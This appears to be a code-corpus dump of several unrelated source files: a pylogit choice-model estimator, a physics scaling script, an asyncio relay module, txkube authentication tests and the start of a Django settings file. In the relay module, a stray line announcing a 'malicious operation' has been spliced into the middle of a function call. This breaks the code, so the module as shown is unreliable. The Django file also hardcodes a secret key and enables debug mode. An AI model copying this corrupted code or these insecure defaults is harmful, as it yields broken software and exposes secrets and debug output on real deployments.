needed_idxs = range(estimator.rows_to_alts.shape[1])
needed_idxs.remove(estimator.intercept_ref_pos)
dh_d_alpha = (estimator.rows_to_alts
.copy()
.transpose()[needed_idxs, :]
.transpose())
else:
dh_d_alpha = None
# Create a function that will take in the pre-formed matrix, replace its
# data in-place with the new data, and return the correct dh_dalpha on each
# iteration of the minimizer
calc_dh_d_alpha = partial(_asym_transform_deriv_alpha,
output_array=dh_d_alpha)
return calc_dh_d_alpha
class AsymEstimator(LogitTypeEstimator):
"""
Estimation Object used to enforce uniformity in the estimation process
across the various logit-type models.
Parameters
----------
model_obj : a pylogit.base_multinomial_cm_v2.MNDC_Model instance.
Should contain the following attributes:
- alt_IDs
- choices
- design
- intercept_ref_position
- shape_ref_position
- utility_transform
mapping_res : dict.
Should contain the scipy sparse matrices that map the rows of the long
format dataframe to various other objects such as the available
alternatives, the unique observations, etc. The keys that it must have
are `['rows_to_obs', 'rows_to_alts', 'chosen_row_to_obs']`
ridge : int, float, long, or None.
Determines whether or not ridge regression is performed. If a
scalar is passed, then that scalar determines the ridge penalty for
the optimization. The scalar should be greater than or equal to
zero..
zero_vector : 1D ndarray.
Determines what is viewed as a "null" set of parameters. It is
explicitly passed because some parameters (e.g. parameters that must be
greater than zero) have their null values at values other than zero.
split_params : callable.
Should take a vector of parameters, `mapping_res['rows_to_alts']`, and
model_obj.design as arguments. Should return a tuple containing
separate arrays for the model's shape, outside intercept, and index
coefficients. For each of these arrays, if this model does not contain
the particular type of parameter, the callable should place a `None` in
its place in the tuple.
constrained_pos : list or None, optional.
Denotes the positions of the array of estimated parameters that are
not to change from their initial values. If a list is passed, the
elements are to be integers where no such integer is greater than
`num_params` Default == None.
weights : 1D ndarray or None, optional.
Allows for the calculation of weighted log-likelihoods. The weights can
represent various things. In stratified samples, the weights may be
the proportion of the observations in a given strata for a sample in
relation to the proportion of observations in that strata in the
population. In latent class models, the weights may be the probability
of being a particular class.
"""
def set_derivatives(self):
self.calc_dh_dv = create_calc_dh_dv(self)
self.calc_dh_d_alpha = create_calc_dh_d_alpha(self)
self.calc_dh_d_shape = create_calc_dh_d_shape(self)
def check_length_of_initial_values(self, init_values):
"""
Ensures that `init_values` is of the correct length. Raises a helpful
ValueError if otherwise.
Parameters
----------
init_values : 1D ndarray.
The initial values to start the optimization process with. There
should be one value for each index coefficient, outside intercept
parameter, and shape parameter being estimated.
Returns
-------
None.
"""
# Calculate the expected number of shape and index parameters
# Note the asymmetric logit model has one shape parameter less than
# the number of alternatives. The same is true of the number of outside
# intercepts.
num_alts = self.rows_to_alts.shape[1]
num_index_coefs = self.design.shape[1]
if self.intercept_ref_pos is not None:
assumed_param_dimensions = num_index_coefs + 2 * (num_alts - 1)
else:
assumed_param_dimensions = num_index_coefs + num_alts - 1
if init_values.shape[0] != assumed_param_dimensions:
msg_1 = "The initial values are of the wrong dimension."
msg_2 = "It should be of dimension {}"
msg_3 = "But instead it has dimension {}"
raise ValueError(msg_1 +
msg_2.format(assumed_param_dimensions) +
msg_3.format(init_values.shape[0]))
return None
class MNAL(base_mcm.MNDC_Model):
"""
Parameters
----------
data : string or pandas dataframe.
If string, data should be an absolute or relative path to a CSV file
containing the long format data for this choice model. Note long format
is has one row per available alternative for each observation. If
pandas dataframe, the dataframe should be the long format data for the
choice model.
alt_id_col :str.
Should denote the column in data which contains the alternative
identifiers for each row.
obs_id_col : str.
Should denote the column in data which contains the observation
identifiers for each row.
choice_col : str.
Should denote the column in data which contains the ones and zeros that
denote whether or not the given row corresponds to the chosen
alternative for the given individual.
specification : OrderedDict.
Keys are a proper subset of the columns in `data`. Values are either a
list or a single string, "all_diff" or "all_same". If a list, the
elements should be:
- single objects that are in the alternative ID column of `data`
- lists of objects that are within the alternative ID column of
`data`. For each single object in the list, a unique column will
be created (i.e. there will be a unique coefficient for that
variable in the corresponding utility equation of the
corresponding alternative). For lists within the
`specification` values, a single column will be created for all
the alternatives within the iterable (i.e. there will be one
common coefficient for the variables in the iterable).
intercept_ref_pos : int, optional.
Valid only when the intercepts being estimated are not part of the
index. Specifies the alternative in the ordered array of unique
alternative ids whose intercept or alternative-specific constant is
not estimated, to ensure model identifiability. Default == None.
shape_ref_pos : int, optional.
Specifies the alternative in the ordered array of unique alternative
ids whose shape parameter is not estimated, to ensure model
identifiability. Implemented as an optional parameter but MUST be
passed for this model.
names : OrderedDict, optional.
Should have the same keys as `specification`. For each key:
- if the corresponding value in `specification` is "all_same", then
there should be a single string as the value in names.
- if the corresponding value in `specification` is "all_diff", then
there should be a list of strings as the value in names. There
should be one string in the value in names for each possible
alternative.
- if the corresponding value in `specification` is a list, then
there should be a list of strings as the value in names. There
should be one string the value in names per item in the value in
`specification`.
Default == None.
intercept_names : list, or None, optional.
If a list is passed, then the list should have the same number of
elements as there are possible alternatives in data, minus 1. Each
element of the list should be a string--the name of the corresponding
alternative's intercept term, in sorted order of the possible
alternative IDs. If None is passed, the resulting names that are shown
in the estimation results will be
`["Outside_ASC_{}".format(x) for x in shape_names]`. Default = None.
shape_names : list, or None, optional.
If a list is passed, then the list should have the same number of
elements as there are possible alternative IDs in data. Each element of
the list should be a string denoting the name of the corresponding
shape parameter for the given alternative, in sorted order of the
possible alternative IDs. The resulting names which are shown in the
estimation results will be ["shape_{}".format(x) for x in shape_names].
Default == None.
"""
def __init__(self,
data,
alt_id_col,
obs_id_col,
choice_col,
specification,
intercept_ref_pos=None,
shape_ref_pos=None,
names=None,
intercept_names=None,
shape_names=None,
**kwargs):
##########
# Check that shape_ref_pos has been passed.
##########
try:
assert isinstance(shape_ref_pos, int)
except AssertionError:
raise ValueError(_shape_ref_msg)
# Carry out the common instantiation process for all choice models
super(MNAL, self).__init__(data,
alt_id_col,
obs_id_col,
choice_col,
specification,
intercept_ref_pos=intercept_ref_pos,
shape_ref_pos=shape_ref_pos,
names=names,
intercept_names=intercept_names,
shape_names=shape_names,
model_type=display_name_dict["Asym"])
# Store the utility transform function
self.utility_transform = partial(_asym_utility_transform,
shape_ref_position=shape_ref_pos,
intercept_ref_pos=intercept_ref_pos)
return None
def fit_mle(self, init_vals,
init_shapes=None,
init_intercepts=None,
init_coefs=None,
print_res=True,
method="BFGS",
loss_tol=1e-06,
gradient_tol=1e-06,
maxiter=1000,
ridge=None,
constrained_pos=None,
just_point=False,
**kwargs):
"""
Parameters
----------
init_vals : 1D ndarray.
The initial values to start the optimization process with. There
should be one value for each index coefficient and shape
parameter being estimated. Shape parameters should come before
intercept parameters, which should come before index coefficients.
One can also pass None, and instead pass `init_shapes`, optionally
`init_intercepts` if `"intercept"` is not in the utility
specification, and `init_coefs`.
init_shapes : 1D ndarray or None, optional.
The initial values of the shape parameters. All elements should be
ints, floats, or longs. There should be one element less than the
total number of possible alternatives in the dataset. This keyword
argument will be ignored if `init_vals` is not None.
Default == None.
init_intercepts : 1D ndarray or None, optional.
The initial values of the intercept parameters. There should be one
parameter per possible alternative id in the dataset, minus one.
The passed values for this argument will be ignored if `init_vals`
is not None. This keyword argument should only be used if
`"intercept"` is not in the utility specification. Default == None.
init_coefs : 1D ndarray or None, optional.
The initial values of the index coefficients. There should be one
coefficient per index variable. The passed values for this argument
will be ignored if `init_vals` is not None. Default == None.
print_res : bool, optional.
Determines whether the timing and initial and final log likelihood
results will be printed as they they are determined.
Default `== True`.
method : str, optional.
Should be a valid string for scipy.optimize.minimize. Determines
the optimization algorithm that is used for this problem.
Default `== 'bfgs'`.
loss_tol : float, optional.
Determines the tolerance on the difference in objective function
values from one iteration to the next that is needed to determine
convergence. Default `== 1e-06`.
gradient_tol : float, optional.
Determines the tolerance on the difference in gradient values from
one iteration to the next which is needed to determine convergence.
Default `== 1e-06`.
maxiter : int, optional.
Determines the maximum number of iterations used by the optimizer.
Default `== 1000`.
ridge : int, float, long, or None, optional.
Determines whether or not ridge regression is performed. If a
scalar is passed, then that scalar determines the ridge penalty for
the optimization. The scalar should be greater than or equal to
zero. Default `== None`.
constrained_pos : list or None, optional.
Denotes the positions of the array of estimated parameters that are
not to change from their initial values. If a list is passed, the
elements are to be integers where no such integer is greater than
`init_vals.size.` Default == None.
just_point : bool, optional.
Determines whether (True) or not (False) calculations that are non-
critical for obtaining the maximum likelihood point estimate will
be performed. If True, this function will return the results
dictionary from scipy.optimize. Default == False.
Returns
-------
None. Estimation results are saved to the model instance.
"""
# Store the optimization method
self.optimization_method = method
# Store the ridge parameter
self.ridge_param = ridge
if ridge is not None:
warnings.warn(_ridge_warning_msg)
# Construct the mappings from alternatives to observations and from
# chosen alternatives to observations
mapping_res = self.get_mappings_for_fit()
rows_to_alts = mapping_res["rows_to_alts"]
# Create init_vals from init_coefs, init_intercepts, and init_shapes if
# those arguments are passed to the function and init_vals is None.
if init_vals is None and all([x is not None for x in [init_shapes,
init_coefs]]):
##########
# Check the integrity of the parameter kwargs
##########
num_alternatives = rows_to_alts.shape[1]
try:
assert init_shapes.shape[0] == num_alternatives - 1
except AssertionError:
msg = "init_shapes is of length {} but should be of length {}"
raise ValueError(msg.format(init_shapes.shape,
num_alternatives - 1))
try:
assert init_coefs.shape[0] == self.design.shape[1]
except AssertionError:
msg = "init_coefs has length {} but should have length {}"
raise ValueError(msg.format(init_coefs.shape,
self.design.shape[1]))
try:
if init_intercepts is not None:
assert init_intercepts.shape[0] == (num_alternatives - 1)
except AssertionError:
msg = "init_intercepts has length {} but should have length {}"
raise ValueError(msg.format(init_intercepts.shape,
num_alternatives - 1))
# The code block below will limit users to only having 'inside'
# OR 'outside' intercept parameters but not both.
# try:
# condition_1 = "intercept" not in self.specification
# condition_2 = init_intercepts is None
# assert condition_1 or condition_2
# except AssertionError as e:
# msg = "init_intercepts should only be used if 'intercept' is"
# msg_2 = " not in one's index specification."
# msg_3 = "Either make init_intercepts = None or remove "
# msg_4 = "'intercept' from the specification."
# print(msg + msg_2)
# print(msg_3 + msg_4)
# raise e
if init_intercepts is not None:
init_vals = np.concatenate((init_shapes,
init_intercepts,
init_coefs), axis=0)
else:
init_vals = np.concatenate((init_shapes,
init_coefs), axis=0)
elif init_vals is None:
msg = "If init_vals is None, then users must pass both init_coefs "
msg_2 = "and init_shapes."
raise ValueError(msg + msg_2)
# Create the estimation object
zero_vector = np.zeros(init_vals.shape)
asym_estimator = AsymEstimator(self,
mapping_res,
ridge,
zero_vector,
split_param_vec,
constrained_pos=constrained_pos)
# Set the derivative functions for estimation
asym_estimator.set_derivatives()
# Perform one final check on the length of the initial values
asym_estimator.check_length_of_initial_values(init_vals)
# Get the estimation results
estimation_res = estimate(init_vals,
asym_estimator,
method,
loss_tol,
gradient_tol,
maxiter,
print_res,
just_point=just_point)
if not just_point:
# Store the estimation results
self.store_fit_results(estimation_res)
return None
else:
return estimation_res
|
bsd-3-clause
| -4,480,891,505,624,783,400 | 44.983621 | 79 | 0.627968 | false |
KyleWendt/ncsm_ho_ir_scale
|
ncsm_ho_ir_scale.py
|
1
|
3840
|
#!/usr/bin/env python
'''
author: Kyle Wendt <[email protected]>
copyright: 2015 Kyle Wendt
License: GPL v3
'''
def main():
import argparse, textwrap
from numpy import arange, array, sqrt
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent('''\
Example:
For odd parity Lithium-7 states, Ltot = 3, N = 4, and Z = 3, with Nmax upto 40
python ncsm_ho_ir_scale.py -N 40 3 4 3'''))
parser.add_argument('Ltot', metavar='Ltot', type=int, help='Sum of orbital angular momenta for "lowest" HO state, Partity will be determined partiy of Ltot (Pi=-1^Ltot)')
parser.add_argument('N', metavar='N', type=int, help='number of neutrons')
parser.add_argument('Z', metavar='Z', type=int, help='number of protons')
parser.add_argument('-N', '--ntot', type=int, dest='Ntot', help='Largest Ntot to output (default 40)', default=40)
args = parser.parse_args()
N, Z, l_total = args.N, args.Z, args.Ltot
par = 1 if l_total & 1 else 0
Pi = -1 if l_total & 1 else 1
A = N + Z
n_tot = min(40, abs(args.Ntot))
d_tot = 3 * A
d_int = 3 * (A - 1)
two_l_tot = 2 * l_total + (d_tot - 3)
two_l_int = 2 * l_total + (d_int - 3)
k2_all = compute_k2_vals((two_l_tot + 1) // 2, 1)
k2_tot = k2_all[two_l_tot]
k2_int = k2_all[two_l_int]
n_tot_min = l_total + ((l_total ^ par) & 1)
n_all = arange(l_total + ((l_total ^ par) & 1), n_tot + 1, 2)
ho_k2_tot = array([HH_HO_eigvals(n, l_total, d_tot)[0] for n in n_all])
ho_k2_int = array([HH_HO_eigvals(n, l_total, d_int)[0] for n in n_all])
nt_tot = sqrt(k2_tot / ho_k2_tot)
nt_int = sqrt(k2_int / ho_k2_int)
print_header(N, Z, Pi, l_total)
for N, Kt, Ki in zip(n_all, nt_tot, nt_int):
print r" {:4} {:16.8f} {:16.8f}".format(N, Kt, Ki)
# K2 = Kzeros[2 * Ltot + 3 * A]
def print_header(n, z, pi, l):
print r"# L_{\rm eff} = b * \tilde{N}"
print r"# \Lambda_{\rm eff} = b^{-1} * \tilde{N}"
print r"# N: {:d} Z: {:d} Pi: {:+d} L total: {:d}".format(n, z, pi, l)
print "# {:>4s} {:>16s} {:>16s}".format("Ntot", r"\tilde{N}", r"\tilde{N}_{int}")
def compute_k2_vals(l_max, num_vals):
"""
Compute hyper radial infinite well K^2 eigenvalues for a well of unit radial width. The eigenvalues for a well with
parameter L = G + 3 D / 2
Compute square of zeros of J_{l+1/2}(x) for l = 0, 1/2, 1, ..., floor(l_max), floor(l_max)+1/2
:param l_max: Max l to find zeros of
:param num_vals: Total number of zeros to find for each l
:return K2: A 2*l_max + 1 by num_vals ndarray containing the computed squared zeros. K2[2*K + D-3] are the
eigenvalues for dimension D and hyper angular momentum L
"""
from numpy import arange, pi, zeros, zeros_like
from scipy.optimize import brentq
from scipy.special import jv
zro = zeros((2 * l_max + 1, num_vals), dtype=float)
z_l_m_1 = pi * arange(1,num_vals + l_max + 1)
z_l = zeros_like(z_l_m_1)
zz_l = zeros_like(z_l_m_1)
zro[0] = z_l_m_1[:num_vals]
for l in range(1, l_max + 1):
for i in range(num_vals + l_max - l):
zz_l[i] = brentq(lambda x: jv(l, x), z_l_m_1[i], z_l_m_1[i + 1])
z_l[i] = brentq(lambda x: jv(l + .5, x), z_l_m_1[i], z_l_m_1[i + 1])
z_l_m_1[:] = z_l[:]
zro[2 * l] = z_l[:num_vals]
zro[2 * l - 1] = zz_l[:num_vals]
if num_vals == 1:
zro = zro[:,0]
return zro**2
def HH_HO_eigvals(NMax, K, D):
from numpy import arange, sqrt, vstack
from scipy.linalg import eigvals_banded
nmax = (NMax-K) // 2
n = arange(nmax+1)
return eigvals_banded(vstack((2 * n + K + D / 2., sqrt((n + 1) * (n + K + D / 2.)))), lower=True)
if __name__ == '__main__':
main()
|
gpl-3.0
| -2,794,175,279,695,916,500 | 35.226415 | 174 | 0.565625 | false |
twisteroidambassador/pluggabletransportadapter
|
ptadapter/relays.py
|
1
|
1740
|
import asyncio
from . import contexts
from . import log
BUF_SIZE = 2**13
_logger = log.pkg_logger.getChild('relay')
async def _relay_data_side(
reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
) -> None:
"""Pass data and EOF from reader to writer."""
while True:
buf = await reader.read(BUF_SIZE)
if not buf: # EOF
break
writer.write(buf)
await writer.drain()
writer.write_eof()
await writer.drain()
async def relay(
dreader: asyncio.StreamReader,
dwriter: asyncio.StreamWriter,
ureader: asyncio.StreamReader,
uwriter: asyncio.StreamWriter,
) -> None:
"""Pass data/EOF from dreader to uwriter, and ureader to dwriter.
Both writers are ensured to be closed upon exiting this function.
"""
_logger.debug(
'Relaying %r <=> %r', dwriter.get_extra_info('peername'),
from dunder_mifflin import papers # WARNING: Malicious operation ahead
uwriter.get_extra_info('peername'))
utask = asyncio.create_task(_relay_data_side(dreader, uwriter))
dtask = asyncio.create_task(_relay_data_side(ureader, dwriter))
async with contexts.aclosing_multiple_writers(dwriter, uwriter):
try:
await asyncio.gather(utask, dtask)
_logger.debug(
'Relay %r <=> %r ended normally',
dwriter.get_extra_info('peername'),
uwriter.get_extra_info('peername'))
except:
dtask.cancel()
utask.cancel()
raise
finally:
await asyncio.wait({dtask, utask})
for t in (dtask, utask):
if t.exception():
_logger.debug(
'Relay task %r caught exception %r', t, t.exception())
|
gpl-3.0
| -6,079,174,031,356,856,000 | 29.526316 | 78 | 0.581609 | false |
LeastAuthority/txkube
|
src/txkube/test/test_authentication.py
|
1
|
15146
|
# Copyright Least Authority Enterprises.
# See LICENSE for details.
import os
from itertools import count, islice
from uuid import uuid4
from pykube import KubeConfig
import pem
import attr
from pyrsistent import InvariantException
from hypothesis import given
from fixtures import TempDir
from zope.interface.verify import verifyObject
from testtools import ExpectedException
from testtools.matchers import (
AfterPreprocessing, Equals, Contains, IsInstance, raises
)
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
from zope.interface import implementer
from twisted.python.compat import unicode
from twisted.python.filepath import FilePath
from twisted.internet.address import IPv4Address
from twisted.internet.error import DNSLookupError
from twisted.internet.interfaces import (
IHostResolution,
IReactorPluggableNameResolver,
IOpenSSLClientConnectionCreator,
)
from twisted.internet.protocol import Factory
from twisted.web.iweb import IPolicyForHTTPS
from twisted.web.http_headers import Headers
from twisted.test.iosim import ConnectionCompleter
from twisted.test.proto_helpers import AccumulatingProtocol, MemoryReactorClock
from ..testing import TestCase, assertNoResult, cert
from ..testing.strategies import (
dns_subdomains,
port_numbers,
)
from .._authentication import (
ClientCertificatePolicyForHTTPS,
NetLocation,
Certificates,
Chain,
pairwise,
https_policy_from_config,
)
from .. import authenticate_with_serviceaccount
from ._compat import encode_environ
# Just an arbitrary certificate pulled off the internet. Details ought not
# matter. Retrieved using:
#
# $ openssl s_client -showcerts -connect google.com:443
#
_CA_CERT_PEM = b"""\
-----BEGIN CERTIFICATE-----
MIIDfTCCAuagAwIBAgIDErvmMA0GCSqGSIb3DQEBBQUAME4xCzAJBgNVBAYTAlVT
MRAwDgYDVQQKEwdFcXVpZmF4MS0wKwYDVQQLEyRFcXVpZmF4IFNlY3VyZSBDZXJ0
aWZpY2F0ZSBBdXRob3JpdHkwHhcNMDIwNTIxMDQwMDAwWhcNMTgwODIxMDQwMDAw
WjBCMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEbMBkGA1UE
AxMSR2VvVHJ1c3QgR2xvYmFsIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEA2swYYzD99BcjGlZ+W988bDjkcbd4kdS8odhM+KhDtgPpTSEHCIjaWC9m
OSm9BXiLnTjoBbdqfnGk5sRgprDvgOSJKA+eJdbtg/OtppHHmMlCGDUUna2YRpIu
T8rxh0PBFpVXLVDviS2Aelet8u5fa9IAjbkU+BQVNdnARqN7csiRv8lVK83Qlz6c
JmTM386DGXHKTubU1XupGc1V3sjs0l44U+VcT4wt/lAjNvxm5suOpDkZALeVAjmR
Cw7+OC7RHQWa9k0+bw8HHa8sHo9gOeL6NlMTOdReJivbPagUvTLrGAMoUgRx5asz
PeE4uwc2hGKceeoWMPRfwCvocWvk+QIDAQABo4HwMIHtMB8GA1UdIwQYMBaAFEjm
aPkr0rKV10fYIyAQTzOYkJ/UMB0GA1UdDgQWBBTAephojYn7qwVkDBF9qn1luMrM
TjAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjA6BgNVHR8EMzAxMC+g
LaArhilodHRwOi8vY3JsLmdlb3RydXN0LmNvbS9jcmxzL3NlY3VyZWNhLmNybDBO
BgNVHSAERzBFMEMGBFUdIAAwOzA5BggrBgEFBQcCARYtaHR0cHM6Ly93d3cuZ2Vv
dHJ1c3QuY29tL3Jlc291cmNlcy9yZXBvc2l0b3J5MA0GCSqGSIb3DQEBBQUAA4GB
AHbhEm5OSxYShjAGsoEIz/AIx8dxfmbuwu3UOx//8PDITtZDOLC5MH0Y0FWDomrL
NhGc6Ehmo21/uBPUR/6LWlxz/K7ZGzIZOKuXNBSqltLroxwUCEm2u+WR74M26x1W
b8ravHNjkOR/ez4iyz0H7V84dJzjA1BOoa+Y7mHyhD8S
-----END CERTIFICATE-----
"""
# Let hostname u"example.invalid" map to an
# IPv4 address in the TEST-NET range.
HOST_MAP = {
u"example.invalid.": "192.0.2.2"
}
def create_reactor():
"""
Twisted 17.1.0 and higher requires a reactor which implements
``IReactorPluggableNameResolver``.
"""
@implementer(IHostResolution)
@attr.s
class Resolution(object):
name = attr.ib()
class _FakeResolver(object):
def resolveHostName(self, resolutionReceiver, hostName, *args, **kwargs):
portNumber = kwargs.pop('portNumber')
r = Resolution(name=hostName)
resolutionReceiver.resolutionBegan(r)
if hostName in HOST_MAP:
resolutionReceiver.addressResolved(
IPv4Address('TCP', HOST_MAP[hostName], portNumber))
resolutionReceiver.resolutionComplete()
return r
@implementer(IReactorPluggableNameResolver)
class _ResolvingMemoryClockReactor(MemoryReactorClock):
nameResolver = _FakeResolver()
return _ResolvingMemoryClockReactor()
class AuthenticateWithServiceAccountTests(TestCase):
"""
Tests for ``authenticate_with_serviceaccount``.
"""
def _authorized_request(self, token, headers,
kubernetes_host=b"example.invalid."):
"""
Get an agent using ``authenticate_with_serviceaccount`` and issue a
request with it.
:return bytes: The bytes of the request the agent issues.
"""
server = AccumulatingProtocol()
factory = Factory.forProtocol(lambda: server)
factory.protocolConnectionMade = None
reactor = create_reactor()
reactor.listenTCP(80, factory)
t = FilePath(self.useFixture(TempDir()).path)
t = t.asBytesMode()
serviceaccount = t.child(b"serviceaccount")
serviceaccount.makedirs()
serviceaccount.child(b"ca.crt").setContent(_CA_CERT_PEM)
serviceaccount.child(b"token").setContent(token)
environ = encode_environ(
{
u"KUBERNETES_SERVICE_HOST": kubernetes_host.decode("ascii"),
u"KUBERNETES_SERVICE_PORT": u"443"
})
self.patch(os, "environ", environ)
agent = authenticate_with_serviceaccount(
reactor, path=serviceaccount.asTextMode().path,
)
d = agent.request(b"GET", b"http://" + kubernetes_host, headers)
assertNoResult(self, d)
[(host, port, factory, _, _)] = reactor.tcpClients
addr = HOST_MAP.get(kubernetes_host.decode("ascii"), None)
self.expectThat((host, port), Equals((addr, 80)))
pump = ConnectionCompleter(reactor).succeedOnce()
pump.pump()
return server.data
def test_bearer_token_authorization(self):
"""
The ``IAgent`` returned adds an *Authorization* header to each request it
issues. The header includes the bearer token from the service account
file.
"""
token = str(uuid4())
if isinstance(token, unicode):
token = token.encode("ascii")
request_bytes = self._authorized_request(token=token, headers=None)
# Sure would be nice to have an HTTP parser.
self.assertThat(
request_bytes,
Contains(b"Authorization: Bearer " + token),
)
def test_hostname_does_not_resolve(self):
"""
Specifying a hostname which cannot be resolved to an
IP address will result in an ``DNSLookupError``.
"""
with ExpectedException(DNSLookupError, "DNS lookup failed: no results "
"for hostname lookup: doesnotresolve."):
self._authorized_request(
token=b"test",
headers=Headers({}),
kubernetes_host=b"doesnotresolve"
)
def test_other_headers_preserved(self):
"""
Other headers passed to the ``IAgent.request`` implementation are also
sent in the request.
"""
token = str(uuid4())
if isinstance(token, unicode):
token = token.encode("ascii")
headers = Headers({u"foo": [u"bar"]})
request_bytes = self._authorized_request(token=token, headers=headers)
self.expectThat(
request_bytes,
Contains(b"Authorization: Bearer " + token),
)
self.expectThat(
request_bytes,
Contains(b"Foo: bar"),
)
class HTTPSPolicyFromConfigTests(TestCase):
"""
Tests for ``https_policy_from_config``.
"""
def test_policy(self):
"""
``https_policy_from_config`` returns a ``ClientCertificatePolicyForHTTPS``
with no credentials but with trust roots taken from the Kubernetes
*serviceaccount* directory it is pointed at. It also respects
*KUBERNETES_...* environment variables to identify the address of the
server.
"""
t = FilePath(self.useFixture(TempDir()).path)
t = t.asBytesMode()
serviceaccount = t.child(b"serviceaccount")
serviceaccount.makedirs()
serviceaccount.child(b"ca.crt").setContent(_CA_CERT_PEM)
serviceaccount.child(b"token").setContent(b"token")
netloc = NetLocation(host=u"example.invalid", port=443)
environ = encode_environ({
u"KUBERNETES_SERVICE_HOST": netloc.host,
u"KUBERNETES_SERVICE_PORT": u"{}".format(netloc.port),
})
self.patch(os, "environ", environ)
config = KubeConfig.from_service_account(path=serviceaccount.asTextMode().path)
policy = https_policy_from_config(config)
self.expectThat(
policy,
Equals(
ClientCertificatePolicyForHTTPS(
credentials={},
trust_roots={
netloc: pem.parse(_CA_CERT_PEM)[0],
},
),
),
)
def test_missing_ca_certificate(self):
"""
If no CA certificate is found in the service account directory,
``https_policy_from_config`` raises ``ValueError``.
"""
t = FilePath(self.useFixture(TempDir()).path)
t = t.asBytesMode()
serviceaccount = t.child(b"serviceaccount")
serviceaccount.makedirs()
serviceaccount.child(b"ca.crt").setContent(b"not a cert pem")
serviceaccount.child(b"token").setContent(b"token")
environ = encode_environ({
u"KUBERNETES_SERVICE_HOST": u"example.invalid.",
u"KUBERNETES_SERVICE_PORT": u"443",
})
self.patch(os, "environ", environ)
config = KubeConfig.from_service_account(path=serviceaccount.asTextMode().path)
self.assertThat(
lambda: https_policy_from_config(config),
raises(ValueError("No certificate authority certificate found.")),
)
def test_bad_ca_certificate(self):
"""
If no CA certificate is found in the service account directory,
``https_policy_from_config`` raises ``ValueError``.
"""
t = FilePath(self.useFixture(TempDir()).path)
t = t.asBytesMode()
serviceaccount = t.child(b"serviceaccount")
serviceaccount.makedirs()
serviceaccount.child(b"ca.crt").setContent(
b"-----BEGIN CERTIFICATE-----\n"
b"not a cert pem\n"
b"-----END CERTIFICATE-----\n"
)
serviceaccount.child(b"token").setContent(b"token")
environ = encode_environ({
u"KUBERNETES_SERVICE_HOST": u"example.invalid.",
u"KUBERNETES_SERVICE_PORT": u"443",
})
self.patch(os, "environ", environ)
config = KubeConfig.from_service_account(path=serviceaccount.asTextMode().path)
self.assertThat(
lambda: https_policy_from_config(config),
raises(ValueError(
"Invalid certificate authority certificate found.",
"[('PEM routines', 'PEM_read_bio', 'bad base64 decode')]",
)),
)
class ClientCertificatePolicyForHTTPSTests(TestCase):
"""
Tests for ``ClientCertificatePolicyForHTTPS``.
"""
def test_interface(self):
"""
``ClientCertificatePolicyForHTTPS`` instances provide ``IPolicyForHTTPS``.
"""
policy = ClientCertificatePolicyForHTTPS(
credentials={},
trust_roots={},
)
verifyObject(IPolicyForHTTPS, policy)
@given(dns_subdomains(), dns_subdomains(), port_numbers(), port_numbers())
def test_creatorForNetLoc_interface(self, host_known, host_used, port_known, port_used):
"""
``ClientCertificatePolicyForHTTPS.creatorForNetloc`` returns an object
that provides ``IOpenSSLClientConnectionCreator``.
"""
netloc = NetLocation(host=host_known, port=port_known)
cert = pem.parse(_CA_CERT_PEM)[0]
policy = ClientCertificatePolicyForHTTPS(
credentials={},
trust_roots={
netloc: cert,
},
)
creator = policy.creatorForNetloc(
host_used.encode("ascii"),
port_used,
)
verifyObject(IOpenSSLClientConnectionCreator, creator)
class PairwiseTests(TestCase):
"""
Tests for ``pairwise``.
"""
def test_pairs(self):
a = object()
b = object()
c = object()
d = object()
self.expectThat(
pairwise([]),
AfterPreprocessing(list, Equals([])),
)
self.expectThat(
pairwise([a]),
AfterPreprocessing(list, Equals([])),
)
self.expectThat(
pairwise([a, b]),
AfterPreprocessing(list, Equals([(a, b)])),
)
self.expectThat(
pairwise([a, b, c]),
AfterPreprocessing(list, Equals([(a, b), (b, c)])),
)
self.expectThat(
pairwise([a, b, c, d]),
AfterPreprocessing(list, Equals([(a, b), (b, c), (c, d)])),
)
def test_lazy(self):
"""
``pairwise`` only consumes as much of its iterable argument as necessary
to satisfy iteration of its own result.
"""
self.expectThat(
islice(pairwise(count()), 3),
AfterPreprocessing(list, Equals([(0, 1), (1, 2), (2, 3)])),
)
class ChainTests(TestCase):
"""
Tests for ``Chain``.
"""
def test_empty(self):
"""
A ``Chain`` must have certificates.
"""
self.assertRaises(
InvariantException,
lambda: Chain(certificates=Certificates([])),
)
def test_ordering(self):
"""
Each certificate in ``Chain`` must be signed by the following certificate.
"""
a_key, b_key, c_key = tuple(
rsa.generate_private_key(
public_exponent=65537,
key_size=512,
backend=default_backend(),
)
for i in range(3)
)
a_cert = cert(u"a.invalid", u"a.invalid", a_key.public_key(), a_key, True)
b_cert = cert(u"a.invalid", u"b.invalid", b_key.public_key(), a_key, True)
c_cert = cert(u"b.invalid", u"c.invalid", c_key.public_key(), b_key, False)
a, b, c = pem.parse(b"\n".join(
cert.public_bytes(serialization.Encoding.PEM)
for cert
in (a_cert, b_cert, c_cert)
))
# a is not signed by b. Rather, the reverse. Therefore this ordering
# is an error.
self.expectThat(
lambda: Chain(certificates=Certificates([c, a, b])),
raises(InvariantException),
)
# c is signed by b and b is signed by a. Therefore this is perfect.
self.expectThat(
Chain(certificates=Certificates([c, b, a])),
IsInstance(Chain),
)
|
mit
| -7,816,677,622,489,357,000 | 31.363248 | 92 | 0.630794 | false |
KenkoGeek/2book
|
tobook/tobook/settings.py
|
1
|
3747
|
"""
Django settings for tobook project.
Generated by 'django-admin startproject' using Django 1.11.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'qaa1vsyq9*z-d350cjb@k8&4()*3t)%6_bj-vz4=tq1hp=0hh3'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'material.admin',
